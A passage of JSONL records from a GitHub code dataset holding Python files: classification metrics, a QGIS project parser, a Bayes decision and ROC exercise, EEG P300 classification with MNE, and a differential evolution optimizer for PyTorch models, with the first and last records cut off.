beta2 = 1 ** 2 # note: only F1 here\n denominator = beta2 * precision + recall\n\n denominator[denominator == 0.0] = 1 # avoid division by 0\n f_score = (1 + beta2) * precision * recall / denominator\n\n if average == \"weighted\":\n weighted = gt_sum\n else:\n weighted = None\n\n if average is not None:\n precision = np.average(precision, weights=weighted)\n recall = np.average(recall, weights=weighted)\n f_score = np.average(f_score, weights=weighted)\n scores = []\n\n for metric_name in self.metrics:\n if metric_name == \"precision\":\n scores.append(precision)\n elif metric_name == \"recall\":\n scores.append(recall)\n elif metric_name == \"F1\":\n scores.append(f_score)\n elif metric_name == \"accuracy\":\n scores.append(accuracy_score)\n else:\n raise NotImplementedError()\n return scores\n\n @staticmethod\n def _prf_divide(numerator, denominator, zero_division):\n \"\"\"\n The function performs division and handles zero-division situations.\n\n Parameters\n ----------\n numerator: numpy.ndarray\n denominator: numpy.ndarray\n zero_division: \"warning\", 0, 1, default=\"warning\"\n Sets the value to return when there is a zero division.\n\n If set to \"warning\", this acts as 0, but warnings are also raised.\n Returns\n -------\n results: numpy.ndarray\n The division results.\n\n \"\"\"\n zero_mask = denominator == 0.0\n denominator_cp = copy.deepcopy(denominator)\n denominator_cp[zero_mask] = 1.0\n ret = numerator / denominator_cp\n if np.sum(zero_mask) == 0:\n return ret\n ret[zero_mask] = 0.0 if zero_division in [\"warning\", 0] else 1.0\n if zero_division == \"warning\":\n warnings.warn(\"zero division encountered\")\n return ret\n\n @staticmethod\n def _check_available(ground_truth, predict, zero_division):\n \"\"\"\n The function to check the parameters.\n If all tests are passed, it will convert the tensor to numpy.\n\n Parameters\n ----------\n ground_truth: Any\n predict: Any\n zero_division: Any\n\n Returns\n -------\n ground_truth: numpy.ndarray\n numpy version of tensor ground_truth\n predict: numpy.ndarray\n numpy version of tensor predict\n\n Raises\n -------\n TypeError: TypeError\n ValueError: ValueError\n \"\"\"\n if not isinstance(ground_truth, torch.Tensor):\n raise TypeError(\"argument ground_truth must be torch.tensor\")\n if not isinstance(predict, torch.Tensor):\n raise TypeError(\"argument predict must be torch.tensor\")\n if ground_truth.dtype not in [torch.int, torch.int8, torch.int16, torch.int32, torch.int64]:\n raise TypeError(\"argument ground_truth must be int tensor\")\n if predict.dtype not in [torch.int, torch.int8, torch.int16, torch.int32, torch.int64]:\n raise TypeError(\"argument predict must be int tensor\")\n if len(ground_truth.shape) != 1:\n raise TypeError(\"argument ground_truth must be 1d tensor\")\n if len(predict.shape) != 1:\n raise TypeError(\"argument predict must be 1d tensor\")\n if ground_truth.shape[0] != predict.shape[0]:\n raise ValueError(\"argument ground_truth and predict must be the same shape\")\n\n zero_division_ok = False\n if isinstance(zero_division, str) and zero_division == \"warning\":\n zero_division_ok = True\n elif isinstance(zero_division, (int, float)) and zero_division in [0, 1]:\n zero_division_ok = True\n\n if not zero_division_ok:\n raise ValueError(\"argument zero_division must be in ['warning', 0, 1]\")\n\n return ground_truth.numpy(), predict.numpy()\n\n def _calculate_confusion_matrix(self, ground_truth, predict):\n \"\"\"\n The function to calculate the confusion matrix for multi-class inputs.\n The labels will be collected and relabeled. (eg: [1, 2, 3] --> [0, 1, 2])\n\n In multi-class confusion matrix :math:`MCM`, the count of true negatives is\n :math:`MCM_{:,0,0}`, false positives is :math:`MCM_{:,0,1}`, false negatives\n is :math:`MCM_{:,1,0}` and true positive is :math:`MCM_{:,1,1}`.\n\n Parameters\n ----------\n ground_truth: numpy.ndarray\n predict: numpy.ndarray\n\n Returns\n -------\n confusion_matrix: numpy.ndarray\n The confusion matrix which has the shape: [num_labels, 2, 2]\n \"\"\"\n # select all labels, remove duplicates and sort\n unique_labels = sorted(self._get_unique_labels(ground_truth, predict))\n\n # do relabeling\n ground_truth_transformed = np.searchsorted(unique_labels, ground_truth)\n predict_transformed = np.searchsorted(unique_labels, predict)\n\n # the number of labels after relabeling\n n_labels = len(unique_labels)\n\n tp = ground_truth_transformed == predict_transformed\n tp_bins = ground_truth_transformed[tp]\n tp_sum = np.bincount(tp_bins, weights=None, minlength=n_labels)\n pred_sum = np.bincount(predict_transformed, minlength=n_labels)\n gt_sum = np.bincount(ground_truth_transformed, minlength=n_labels)\n fp = pred_sum - tp_sum\n fn = gt_sum - tp_sum\n tp = tp_sum\n tn = ground_truth_transformed.shape[0] - tp - fp - fn\n return np.array([tn, fp, fn, tp]).T.reshape(-1, 2, 2)\n\n @staticmethod\n def _get_unique_labels(*lists):\n \"\"\"\n find the unique elements in the given lists\n\n Parameters\n ----------\n lists: [numpy.ndarray]\n List of lists which contain labels.\n Returns\n -------\n unique_labels: numpy.ndarray\n It has unique labels encountered in the ``lists``.\n \"\"\"\n ret = []\n for li in lists:\n unique_li = np.unique(li)\n ret.extend(unique_li.tolist())\n ret = list(set(ret))\n return np.array(ret)\n","repo_name":"graph4ai/graph4nlp","sub_path":"graph4nlp/pytorch/modules/evaluation/accuracy.py","file_name":"accuracy.py","file_ext":"py","file_size_in_byte":9915,"program_lang":"python","lang":"en","doc_type":"code","stars":1637,"dataset":"github-code","pt":"32"}
+{"seq_id":"28824983423","text":"import os\n\nfrom collections import OrderedDict\nfrom PyQt4.QtXml import QDomDocument\nfrom PyQt4.QtCore import QDir, QFileInfo\n\nfrom qgis.gui import QgsMapCanvasLayer\nfrom qgis.core import QgsVectorLayer, QgsRasterLayer, QgsMapLayerRegistry, QgsMapSettings, QgsProject\n\n\ndef layer_by_id(layerid):\n return QgsMapLayerRegistry.instance().mapLayers()[layerid]\n\n\ndef iternodes(nodes):\n for index in xrange(nodes.length()):\n yield nodes.at(index).toElement()\n\n\nclass Project(object):\n def __init__(self, xmldoc):\n self.doc = xmldoc\n self._maplayers = None\n\n @classmethod\n def fromFile(cls, filename):\n QDir.setCurrent(os.path.dirname(filename))\n fileinfo = QFileInfo(filename)\n QgsProject.instance().read(fileinfo)\n xml = open(filename).read()\n doc = QDomDocument()\n doc.setContent(xml)\n return cls(doc)\n\n def _createLayer(self, node):\n type = node.attribute('type')\n if type == \"vector\":\n layer = QgsVectorLayer()\n elif type == \"raster\":\n layer = QgsRasterLayer()\n else:\n return None\n layer.readLayerXML(node)\n return layer\n\n def _getLayer(self, node):\n filelist = node.elementsByTagName(\"legendlayerfile\")\n layerfile = filelist.at(0).toElement()\n layerid = layerfile.attribute('layerid')\n visible = int(layerfile.attribute('visible'))\n return layerid, bool(visible)\n\n def maplayers(self):\n return QgsMapLayerRegistry.instance().mapLayers().values()\n\n def legendlayers(self):\n legendnodes = self.doc.elementsByTagName(\"legendlayer\")\n layers = OrderedDict()\n for elm in iternodes(legendnodes):\n layerid, visible = self._getLayer(elm)\n layers[layerid] = visible\n return layers\n\n def settings(self):\n \"\"\"\n Return the settings that have been set for the map canvas.\n @return: A QgsMapSettings instance with the settings read from the project.\n \"\"\"\n canvasnodes = self.doc.elementsByTagName(\"mapcanvas\")\n node = canvasnodes.at(0).toElement()\n settings = QgsMapSettings()\n settings.readXML(node)\n return settings\n\n def visiblelayers(self):\n # Filter out only the ones we can see.\n visible = [layerid for layerid, visible in self.legendlayers().iteritems() if visible]\n return [layer_by_id(layerid) for layerid in visible]\n","repo_name":"NathanW2/qgis2img","sub_path":"qgis2img/projectparser.py","file_name":"projectparser.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"32"}
+{"seq_id":"37236627056","text":"# Statistische Muserekennung WS 2023\n# Benjamin Stifter, 01618881\n# Olivia Panzenböck, 11775488\n\nimport numpy as np\nfrom scipy import stats\nimport matplotlib.pyplot as plt\nimport scipy.integrate as integrate\n\n\n# Aufgabe3\n\ndef dichte(x, mu, std):\n p_x=[]\n for i in x:\n p_x1 = 1/(np.sqrt(2*np.pi)*std) * np.exp(-np.power(i-mu,2)/(2*np.power(std,2))) # S. 237\n p_x.append(p_x1)\n return p_x\n\ndef rand(x, p_x_mu, p_mu, p_x_mu2, p_mu2 ):\n p_x=[]\n for i in range(len(x)):\n p_x1=p_x_mu[i] * p_mu +p_x_mu2[i] * p_mu2\n p_x.append(p_x1)\n return p_x\n\n return\n\ndef posterior(x, p_x_mu, p_mu, p_x):\n p_mu_x=[]\n for i in range(len(x)):\n p_mu_x1=(p_mu[i] * p_x_mu) / p_x[i]\n p_mu_x.append(p_mu_x1)\n return p_mu_x\n\n# Werte\np_H0 = [0.9, 0.99]\np_H1 = [0.1, 0.01]\nmu_H0 = 4\nstd_H0 = np.sqrt(1)\nmu_H1 = 5\nstd_H1 = np.sqrt(1)\n\n# Aufgabe a)\nx_values=np.linspace(0, 12, 1000)\n\nFalse_P = 1-stats.norm.cdf(x_values, loc=mu_H0, scale=std_H0) # false positive\nTrue_P = 1-stats.norm.cdf(x_values, loc=mu_H1, scale=std_H1) # true positive\n\nVW1=[]\nVW2=[]\nfor i, j in enumerate(x_values):\n a = (True_P[i] * p_H1[0]) / (True_P[i] * p_H1[0] + False_P[i] * p_H0[0])\n b = (True_P[i] * p_H1[1]) / (True_P[i] * p_H1[1] + False_P[i] * p_H0[1])\n VW1.append(a)\n VW2.append(b)\n\n\nplt.figure(figsize=(18, 12))\nplt.plot(x_values, VW1, color='orange', label=r'$H_0$ = 0.9, $H_1$ = 0.1')\nplt.plot(x_values, VW2, color='brown', label=r'$H_0$ = 0.99, $H_1$ = 0.01')\n#plt.title(r'positiven Vorhersagewert als Funktion der Entscheidungsgrenze')\nplt.ylabel(r'$p(H_1|+)$')\nplt.xlabel(r'$x^*$')\nplt.legend()\nplt.grid(True)\nplt.savefig('plots/Aufgabe3/a.eps', format='eps')\nplt.show()\n\n\n# Aufgabe b)\npx_H0 = dichte(x_values, mu_H0, std_H0)\npx_H1 = dichte(x_values, mu_H1, std_H1)\npx_9 = rand(x_values, px_H0, p_H0[0], px_H1, p_H1[0])\npx_99 = rand(x_values, px_H0, p_H0[1], px_H1, p_H1[1])\np_H0_x_9 = posterior(x_values,p_H0[0], px_H0, px_9)\np_H1_x_9 = posterior(x_values,p_H1[0], px_H1, px_9)\np_H0_x_99 = posterior(x_values,p_H0[1], px_H0, px_99)\np_H1_x_99 = posterior(x_values,p_H1[1], px_H1, px_99)\n\n# Schnittmenge finden\nround1 = [round(zahl, 5) for zahl in p_H0_x_9]\nround2 = [round(zahl, 5) for zahl in p_H1_x_9]\ngemeinsame_elemente = set(round1).intersection(round2)\ngemeinsame_elemente = [x for x in round1 if x in round2]\nprint(list(gemeinsame_elemente))\nP1_err_H0 = 1-stats.norm.cdf(6.7, loc=mu_H0, scale=std_H0)*p_H0[0]\nP2_err_H0 = stats.norm.cdf(6.7, loc=mu_H1, scale=std_H1)*p_H1[0]\nR1 = 1-stats.norm.cdf(9.1, loc=mu_H0, scale=std_H0)*p_H0[1]\nR2 = stats.norm.cdf(9.1, loc=mu_H1, scale=std_H1)*p_H1[1]\n\nBFR_9 = P1_err_H0 + P2_err_H0\nBFR_99 = R1 + R2\n\nprint(BFR_9)\nprint(BFR_99)\n\nplt.figure(figsize=(18, 12))\nplt.plot(x_values, p_H0_x_9, label=r'$H_0$ = 0.9, $H_1$ = 0.1', color='orange')\nplt.plot(x_values, p_H1_x_9, color='orange')\nplt.plot(x_values, p_H0_x_99, color='brown')\nplt.plot(x_values, p_H1_x_99, label=r'$H_0$ = 0.99, $H_1$ = 0.01', color='brown')\nplt.plot([6.7, 6.7], [0, 1], color='k')\nplt.plot([9.1, 9.1], [0, 1], label='Entscheidungsgrenzen', color='k')\nplt.title('Posteriors')\nplt.grid(True)\nplt.ylabel(r'$p(H_i|x)$')\nplt.xlabel(r'$x$')\nplt.legend()\nidx1 = np.argwhere(np.diff(np.sign(np.array(p_H0_x_9) - np.array(p_H1_x_9)))).flatten()\nidx2 = np.argwhere(np.diff(np.sign(np.array(p_H0_x_99) - np.array(p_H1_x_99)))).flatten()\nprint(idx1)\nprint(idx2)\nprint(x_values[514])\nprint(x_values[698])\nplt.savefig('plots/Aufgabe3/b_3.eps', format='eps')\nplt.show()\n\n\n\n# Aufgabe c)\nplt.figure(figsize=(18, 12))\nplt.plot(False_P, True_P, color='green')\n#plt.title(r'ROC-Kurve')\nplt.xlabel(r'$\\alpha$')\nplt.ylabel(r'$1 - \\beta$')\nplt.grid(True)\nplt.savefig('plots/Aufgabe3/c.eps', format='eps')\nplt.show()\n\n\n\n#Test\nplt.figure(figsize=(18, 12))\np_x_H0 = dichte(x_values, mu_H0, std_H0)\np_x_H1 = dichte(x_values, mu_H1, std_H1)\nplt.plot(x_values, p_x_H0, label=r'$H_0$ - gesund', color='red', linestyle='--')\nplt.plot(x_values, p_x_H1, label=r'$H_1$ - infiziert', color='blue', linestyle='--')\nplt.plot(x_values, p_H0_x_9, label=r'$H_0$ = 0.9', color='red')\nplt.plot(x_values, p_H1_x_9,label=r'$H_1$ = 0.1', color='blue')\nplt.plot([6.7, 6.7], [0, 1], label='Entscheidungsgrenzen', color='k')\nplt.title(r'Wahrscheinlichkeitsfuntion $H_0$ und $H_1$')\nplt.grid(True)\nplt.ylabel(r'$p(x|H_i)$')\nplt.xlabel(r'$x$')\nplt.legend()\nplt.savefig('plots/Aufgabe3/b_1.eps', format='eps')\nplt.show()\n\n#Test\nplt.figure(figsize=(18, 12))\np_x_H0 = dichte(x_values, mu_H0, std_H0)\np_x_H1 = dichte(x_values, mu_H1, std_H1)\nplt.plot(x_values, p_x_H0, label=r'$H_0$ - gesund',color='red', linestyle='--')\nplt.plot(x_values, p_x_H1, label=r'$H_1$ - infiziert', color='blue', linestyle='--')\nplt.plot(x_values, p_H0_x_99, label=r'$H_0$ = 0.99', color='red')\nplt.plot(x_values, p_H1_x_99,label=r'$H_1$ = 0.01', color='blue')\nplt.plot([9.1, 9.1], [0, 1], label='Entscheidungsgrenzen', color='k')\nplt.title(r'Wahrscheinlichkeitsfuntion $H_0$ und $H_1$')\nplt.grid(True)\nplt.ylabel(r'$p(x|H_i)$')\nplt.xlabel(r'$x$')\nplt.legend()\nplt.savefig('plots/Aufgabe3/b_2.eps', format='eps')\nplt.show()","repo_name":"livi099/Statistische_Mustererkennung_UE","sub_path":"Uebung2/Aufgabe 3 old.py","file_name":"Aufgabe 3 old.py","file_ext":"py","file_size_in_byte":5109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"7774565972","text":"\"\"\"\r\nCreated on Wed Feb 14 22:22:09 2018\r\n\r\n@author: Anet\r\nprint(__doc__)\r\n\"\"\"\r\nimport mne\r\nimport numpy as np\r\nfrom mne import io\r\nimport platform; print(platform.platform())\r\nimport sys; print(\"Python\", sys.version)\r\nimport numpy; print(\"NumPy\", numpy.__version__)\r\nimport scipy; print(\"SciPy\", scipy.__version__)\r\nimport sklearn; print(\"Scikit-Learn\", sklearn.__version__)\r\nimport feature as ft\r\nimport lda as lda\r\nimport epochs_methods as epoch_met\r\nimport input_test_data as load_file_names\r\nfrom builtins import print\r\nimport mix_data_x_y as mix\r\nimport config\r\nimport neural_network as neural_network\r\nimport print_results\r\nfrom numpy.random import seed\r\nfrom keras.models import load_model\r\n\r\n\r\nseed(1)\r\n\r\n\r\n#turn off log\r\nmne.set_log_level('ERROR')\r\n# import os\r\n# os.environ[\"TF_CPP_MIN_LOG_LEVEL\"]=\"4\"\r\n\r\n# Set path to raw data folder \r\nDATA_FOLDER ='C:/Users/Anet/eclipse-workspace/Classification/raw_data/'\r\n\r\n\r\n# Set EEG event list - instruction\r\n\r\n\r\n\r\n##############################################\r\n#\r\n# Data loading\r\n#\r\n##############################################\r\n\r\n# mapu, ve ktere jsou ulozeny nazvy trenovacich souboru a jejich targetove/non-targetove znacky\r\nfiles_training_map = load_file_names.load_training_data_names()\r\n\r\n# mapu, ve ktere jsou ulozeny nazvy testovacich souboru a jejich targetove nazvy\r\nfiles_testing_map = load_file_names.load_predicting_data_names()\r\n\r\n\r\n\r\ndata_training_count = len(files_training_map)\r\ndata_predicting_count = len(files_testing_map)\r\n\r\n##############################################\r\n#\r\n# Loading data to train\r\n#\r\n##############################################\r\nraw = []\r\nfor i in range(data_training_count):\r\n path = DATA_FOLDER + (files_training_map[i][0])\r\n raw.append(io.read_raw_brainvision(vhdr_fname=path, preload=True))\r\n raw[i].filter(config.low_filter_frequency,config.high_filter_frequency)\r\n# print(raw[i]._events)\r\n\r\n##############################################\r\n#\r\n# Loading data to predict\r\n#\r\n##############################################\r\nraw_to_predict = []\r\ntrue_prediction = []\r\nfor i in range(data_predicting_count):\r\n path = DATA_FOLDER + (files_testing_map[i][0])\r\n true_prediction.append(files_testing_map[i][1])\r\n true_prediction[i] = true_prediction[i].strip()\r\n raw_to_predict.append(io.read_raw_brainvision(vhdr_fname=path, preload=True))\r\n raw_to_predict[i].filter(config.low_filter_frequency,config.high_filter_frequency)\r\n\r\n \r\n##############################################\r\n#\r\n# Epochs creating\r\n#\r\n##############################################\r\n \r\n# Vytvori epochy pro klasifikaci\r\nevent_to_predict = []\r\nepochs_to_predict = []\r\nfor i in range(data_predicting_count):\r\n event_to_predict.append(raw_to_predict[i]._events)\r\n \r\n if(i < config.instruction_files_to_pred):\r\n\r\n epochs_to_predict.append(mne.Epochs(raw_to_predict[i],event_to_predict[i], event_id=config.event_id_instruction, tmin=config.epoch_tmin, tmax=config.epoch_tmax,baseline=(config.baseline_min, config.baseline_max), preload=True))\r\n else:\r\n epochs_to_predict.append(mne.Epochs(raw_to_predict[i],event_to_predict[i], event_id=config.event_id_matrix, tmin=config.epoch_tmin, tmax=config.epoch_tmax,baseline=(config.baseline_min, config.baseline_max), preload=True))\r\n \r\n \r\n\r\n# Plot raw data\r\n# raw[0].plot(block=True, lowpass=40, n_channels=5)\r\n\r\n# for i in range(data_count): \r\n# raw[i].plot(block=True, lowpass=40, n_channels=6)\r\n\r\n##############################################\r\n#\r\n# \r\n#\r\n##############################################\r\n\r\n\r\n\r\n\r\n# Set color of events\r\n\"\"\"\r\n\r\n\r\nfor i in range(data_count):\r\n mne.viz.plot_events(events[i],raw[i].info['sfreq'], raw[i].first_samp, color=config.color)\r\n \"\"\"\r\n\r\n#extract epochs\r\n\r\nevents_train = []\r\nepochs = []\r\nepochs_targets = []\r\nepochs_non_targets = []\r\n\r\n\r\n\r\n# Vytvori epochy, z vytvorenych Epoch potom vybere ty targetove a ulozi je do epochs_target\r\n\r\nfor i in range(data_training_count):\r\n events_train.append(raw[i]._events)\r\n \r\n if(i < config.instruction_files_count):\r\n epochs.append(mne.Epochs(raw[i],events_train[i], event_id=config.event_id_instruction, tmin=config.epoch_tmin, tmax=config.epoch_tmax,baseline=(config.baseline_min, config.baseline_max), preload=True))\r\n instruction = 1\r\n else:\r\n epochs.append(mne.Epochs(raw[i],events_train[i], event_id=config.event_id_matrix, tmin=config.epoch_tmin, tmax=config.epoch_tmax,baseline=(config.baseline_min, config.baseline_max), preload=True))\r\n instruction = 0\r\n \r\n epochs_targets.append(epoch_met.filter_epochs_target(epochs[i], events_train[i], files_training_map[i][1], instruction)) \r\n epochs_non_targets.append(epoch_met.filter_epochs_target(epochs[i], events_train[i], files_training_map[i][2], instruction)) \r\n \r\n\r\n\r\n\"\"\"\r\nfor i in range(data_count):\r\n mne.viz.plot_epochs(epochs[i])\r\n\"\"\"\r\n\r\n# epochs.plot(title=\"Events epochs\", n_epochs=(len(epochs.events)),event_colors=color)\r\n# mne.viz.plot_epochs(epochs, title=\"Events epochs\", n_epochs=15,event_colors=color)\r\n\r\n\r\n\r\n# Create evoked structure\r\n\r\nevoked_dict = [[]]\r\n# jen pro instruction\r\nfor i in range(config.instruction_files_count):\r\n evoked_dict.append('')\r\n evoked_dict[i] = dict()\r\n for condition in config.conditions:\r\n evoked_dict[i][condition] = epochs[i][condition].average()\r\n \r\n\r\n# Plot chart \r\n\r\n\"\"\"\r\nfor i in range(data_count):\r\n mne.viz.plot_compare_evokeds(evoked_dict[i], title=\"ERP chart\", colors=config.colors, linestyles=config.linestyles, gfp=False)\r\n\"\"\"\r\n\r\n\"\"\"\r\n\r\nExtrakce priznaku\r\n\r\n\"\"\"\r\nlabels = epochs[0].events[:, -1]\r\n\r\n#feature extraction\r\n \r\ntarget_features = []\r\nnon_target_features = []\r\nx = []\r\n\r\n\r\ntest_sample_count = 5\r\n\r\n\r\ny = []\r\n\r\n\r\n# Prepare data to training \r\ntarget_nontarget_epochs = epochs_targets + epochs_non_targets\r\n\r\n\r\nfor i in range(len(target_nontarget_epochs)):\r\n #count of target epochs \r\n for j in range(len(target_nontarget_epochs[i])):\r\n \r\n pick_epochs = target_nontarget_epochs[i][j].pick_channels(config.chan)\r\n x.append(ft.feature_vector(pick_epochs))\r\n if(i < epochs_targets.__len__()):\r\n y.append(1)\r\n else:\r\n y.append(0)\r\n\r\n\r\n# Prepare data to predict \r\nx_pred = []\r\n\r\ny = np.array(y)\r\n\r\nfor i in range(data_predicting_count):\r\n x_pred.append([])\r\n for j in range(len(epochs_to_predict[i])):\r\n pick_epoch_to_predict = epochs_to_predict[i][j].pick_channels(config.chan)\r\n x_pred[i].append(ft.feature_vector(pick_epoch_to_predict))\r\n\r\n\r\n\r\n\r\nmix.mix_data(x, y)\r\n\r\n# X = np.reshape(X,(-1, 100))\r\n\r\n##############################################\r\n#\r\n# Predicting\r\n#\r\n##############################################\r\n\r\n# plotting means of training data\r\n# plt.plot(np.mean(X[y==1], axis=0))\r\n# plt.plot(np.mean(X[y==0], axis=0))\r\n# plt.show()\r\n\r\n\r\n# plotting tests epochs\r\n# for i in range(len(X_pred)):\r\n# name = str(i)+'.png'\r\n# plt.plot(X_pred[i])\r\n# plt.savefig(name)\r\n\r\n\r\n\r\nx_event_lda = []\r\nx_event_neural = []\r\n\r\nprint()\r\nprint(\"If you want to load model from file: 1\")\r\nprint(\"If you want to train new model : 0\")\r\nprint()\r\nmodel_load = input(\"Load model? 1/0: \")\r\nif(model_load == '1'):\r\n config.model = load_model('save_models/mymodel_5.h5') \r\nelse:\r\n if(model_load == '0'):\r\n neural_network.train(x, y)\r\n else:\r\n print(\"Invalid option\")\r\n\r\n\r\nfor i in range(data_predicting_count):\r\n x_event_lda.append(lda.solve(x,y,x_pred[i]))\r\n x_event_neural.append(neural_network.solve(x_pred[i]))\r\n\r\n\r\nfor i in range(data_predicting_count):\r\n print()\r\n print(\"##########################################\")\r\n print()\r\n \r\n \r\n if(i < config.instruction_files_to_pred):\r\n \r\n print(i+1,\".) Expected solve: \",true_prediction[i])\r\n print()\r\n \r\n instruction = 1\r\n print(\"LDA: \")\r\n print_results.print_guess(x_event_lda[i], epochs_to_predict[i], true_prediction[i],instruction)\r\n print(\"Neural network: \")\r\n print_results.print_guess(x_event_neural[i], epochs_to_predict[i], true_prediction[i],instruction)\r\n \r\n else:\r\n if(i%2==1):\r\n print(i+1,\".) Expected solve: \",true_prediction[i],true_prediction[i+1])\r\n \r\n print()\r\n \r\n instruction = 0\r\n print(\"LDA: \")\r\n print_results.print_guess(x_event_lda[i], epochs_to_predict[i], true_prediction[i],instruction)\r\n print(\"Neural network: \")\r\n print_results.print_guess(x_event_neural[i], epochs_to_predict[i], true_prediction[i],instruction)\r\n \r\n print()\r\n\r\n\r\n\r\n\r\n","repo_name":"medunova/Classificator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"2961502300","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom operator import itemgetter\nfrom datetime import datetime\nimport copy\nimport torch\n\n\nclass DE:\n\n def __init__(self, objective_function, population_function, X, y, Xtest=None, ytest=None, pop_size=50,\n F=0.5, cr=0.5, start_agent=None, use_cuda=False):\n if use_cuda and torch.cuda.is_available:\n self.device = torch.device('cuda')\n print('Using GPU')\n else:\n self.device = torch.device('cpu')\n self.obj = objective_function\n self.X = X.to(self.device)\n self.y = y.long().to(self.device)\n self.N = pop_size\n self.pop_func = population_function\n self.F = torch.Tensor([F]).to(self.device)\n self.cr = torch.Tensor([cr]).to(self.device)\n self.pop = [population_function().to(self.device) for i in range(pop_size)]\n self.testNN = population_function().to(self.device)\n self.testcost = False\n if start_agent is not None:\n self.pop[0] = copy.deepcopy(start_agent)\n if Xtest is not None and ytest is not None:\n self.Xtest = Xtest.to(self.device)\n self.ytest = ytest.long().to(self.device)\n self.testcost = True\n\n def save_model(self, fname, path='../Conv1DModels/', agent=None):\n if agent is None:\n agent = self.best_agent\n torch.save(agent, path+fname)\n\n def load_model(self, fname, path='../Conv1DModels/'):\n return torch.load(path+fname)\n\n def NN_obj(self, agent):\n yhat = agent(self.X)[0].T\n return self.obj(yhat, self.y)\n\n def mutation(self, nets):\n\n for testp, p1, p2, p3 in zip(*[net.parameters() for net in nets]):\n testp.data = p1 + self.F * (p2 - p3)\n\n pass\n\n def crossover(self, target):\n\n for dw, tw in zip(self.testNN.parameters(), target.parameters()):\n crit = torch.rand(dw.shape, device=self.device) < self.cr\n trial_w = crit * dw + ~crit * tw\n dw.data = trial_w\n\n pass\n\n def evolution(self, num_epochs, verbose=False, print_epoch=1000):\n # evaluate the initialized population with the objective function\n obj_all = torch.Tensor([self.NN_obj(agent) for agent in self.pop])\n\n # find the best agent within the initial population\n self.best_agent = self.pop[torch.argmin(obj_all)]\n\n best_obj = torch.min(obj_all)\n prev_obj = best_obj\n\n self.best_objs = np.zeros(num_epochs + 1)\n self.best_objs[0] = best_obj\n\n if self.testcost:\n self.best_test_objs = np.zeros(num_epochs + 1)\n self.best_test_objs[0] = self.obj(self.best_agent(self.Xtest)[0].T, self.ytest)\n\n for i in range(num_epochs):\n for j, x in enumerate(self.pop):\n\n choice = np.random.choice(np.delete(np.arange(self.N), j), 3, replace=False)\n a, b, c = itemgetter(*choice)(self.pop)\n # a, b, c = self.pop[np.random.choice(np.delete(np.arange(self.N), j), 3, replace=False)]\n\n # Mutation\n self.mutation([self.testNN, a, b, c])\n\n # Crossover\n self.crossover(x)\n\n # Selection\n obj_u = self.NN_obj(self.testNN)\n if obj_u < self.NN_obj(x):\n self.pop[j] = copy.deepcopy(self.testNN)\n obj_all[j] = obj_u\n\n # update the current best objective function value\n best_obj = torch.min(obj_all)\n self.best_objs[i + 1] = best_obj\n\n if best_obj < prev_obj:\n # update best agent\n self.best_agent = self.pop[torch.argmin(obj_all)]\n # update previous solution to use for next iteration\n prev_obj = best_obj\n\n if self.testcost:\n self.best_test_objs[i + 1] = self.obj(self.best_agent(self.Xtest)[0].T, self.ytest)\n\n if verbose and i % print_epoch == 0:\n # report progress at each iteration\n print('%d: cost= %.5f' % (i, best_obj))\n print('%d: testcost= %.5f' % (i, self.best_test_objs[i + 1]))\n print('%d: acc= %.5f' % (i, self.accuracy(self.best_agent(self.X), self.y)))\n print('%d: testacc= %.5f' % (i, self.accuracy(self.best_agent(self.Xtest), self.ytest)))\n plt.plot(list(self.best_agent.parameters())[0].cpu().detach()[0][0])\n plt.show()\n\n return self.best_agent\n\n def evaluate(self, plot_function=None, agent=None, bounds=None, title=' '):\n\n if agent is None:\n agent = self.best_agent\n plt.figure(figsize=(13, 8))\n plt.plot(range(len(self.best_objs)), self.best_objs)\n plt.plot(range(len(self.best_test_objs)), self.best_test_objs)\n plt.title('Training Graph', fontsize=24)\n plt.xlabel('Iterations', fontsize=20)\n plt.ylabel('Cost', fontsize=20)\n plt.legend(['Train', 'Test'], fontsize=14)\n plt.show()\n\n if plot_function is not None:\n plot_function(agent, self.Xtest, self.ytest, title=title, savefig=False)\n\n print(f\"Best agent is {agent} with a train cost of {np.round(self.NN_obj(agent).cpu().detach(), 5)}.\")\n print(f\"And a test cost of {np.round(self.obj(agent(self.Xtest)[0].T, self.ytest).cpu().detach(), 5)}\")\n\n # print(f\"Worst initialization was {self.initial_worst_agent} with a cost of \\\n # {np.round(self.obj(self.initial_worst_agent), 2)}.\")\n\n pass\n\n def accuracy(self, predictions, ytest):\n predictions = predictions.argmax(axis=1)\n correct_preds = ytest == predictions\n return torch.sum(correct_preds) / len(ytest)\n\n def early_stop_training(self, patience, measure='cost', eval=True, v=True):\n\n n = 1\n iterations = 0\n if measure == 'cost':\n no_iterations_rising = 0\n val_error = 20000\n obj_all = torch.Tensor([self.NN_obj(agent) for agent in self.pop])\n self.opt_agent = copy.deepcopy(self.pop[torch.argmin(obj_all)])\n opt_iterations = iterations\n testcosts = []\n\n while (no_iterations_rising < patience):\n self.evolution(num_epochs=n, verbose=False, print_epoch=1)\n iterations = iterations + n\n val_error_new = self.obj(self.best_agent(self.Xtest)[0].T, self.ytest)\n testcosts.append(val_error_new.item())\n if (val_error_new < val_error):\n if v: print(f\"{iterations}: Test Cost Falling {val_error_new}\")\n no_iterations_rising = 0\n self.opt_agent = copy.deepcopy(self.best_agent)\n opt_iterations = iterations\n val_error = val_error_new\n else:\n no_iterations_rising += n\n\n testcosts = np.array(testcosts)\n if v:\n print(\"Optimal number of iterations:\", opt_iterations)\n print(\"Best error:\", val_error)\n print(\"Error at stop:\", val_error_new)\n\n elif measure == 'accuracy':\n no_iterations_falling = 0\n val_acc = 0\n opt_iterations = iterations\n testcosts = []\n obj_all = torch.Tensor([self.NN_obj(agent) for agent in self.pop])\n self.opt_agent = copy.deepcopy(self.pop[torch.argmin(obj_all)])\n\n while (no_iterations_falling < patience):\n self.evolution(num_epochs=n, verbose=False, print_epoch=1)\n iterations = iterations + n\n val_acc_new = self.accuracy(self.best_agent(self.Xtest), self.ytest)\n testcosts.append(val_acc_new.item())\n if (val_acc_new > val_acc):\n if v: print(f\"{iterations}: Test Accuracy Rising {val_acc_new}\")\n no_iterations_falling = 0\n self.opt_agent = copy.deepcopy(self.best_agent)\n opt_iterations = iterations\n val_acc = val_acc_new\n else:\n no_iterations_falling += n\n # 